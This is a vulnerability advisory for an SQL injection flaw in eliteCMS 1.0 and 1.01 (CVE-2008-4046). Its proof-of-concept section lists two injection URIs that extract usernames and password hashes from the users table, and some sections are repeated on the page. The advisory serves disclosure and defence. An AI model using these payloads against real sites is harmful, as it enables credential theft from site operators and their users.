eliteCMS 'page' Parameter SQL Injection Vulnerability
BID:30990
Info
eliteCMS 'page' Parameter SQL Injection Vulnerability
| Bugtraq ID: | 30990 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-4046 |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 03 2008 12:00AM |
| Updated: | May 07 2015 05:24PM |
| Credit: | e.wiZz! reorted the issue for version 1.0; xeno_hive confirmed the issue in version 1.01 |
| Vulnerable: |
eliteCMS eliteCMS 1.01 eliteCMS eliteCMS 1.0 |
| Not Vulnerable: | |
Discussion
eliteCMS 'page' Parameter SQL Injection Vulnerability
eliteCMS is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input.
Attackers may exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
eliteCMS 1.0 and 1.01 are vulnerable; other versions may also be affected.
eliteCMS is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input.
Attackers may exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
eliteCMS 1.0 and 1.01 are vulnerable; other versions may also be affected.
Exploit / POC
eliteCMS 'page' Parameter SQL Injection Vulnerability
An attacker can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com/index.php?page=-1%20union%20all%20select%201,2,3,4,user_name,h_password%20from%20users/*
http://www.example.com/index.php?page=-1'+union+select+1,concat(user_name,0x3a,h_password),3,4,5,6,7,8,9,10,11+from+users+limit+0,1/*
An attacker can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com/index.php?page=-1%20union%20all%20select%201,2,3,4,user_name,h_password%20from%20users/*
http://www.example.com/index.php?page=-1'+union+select+1,concat(user_name,0x3a,h_password),3,4,5,6,7,8,9,10,11+from+users+limit+0,1/*
Solution / Fix
eliteCMS 'page' Parameter SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].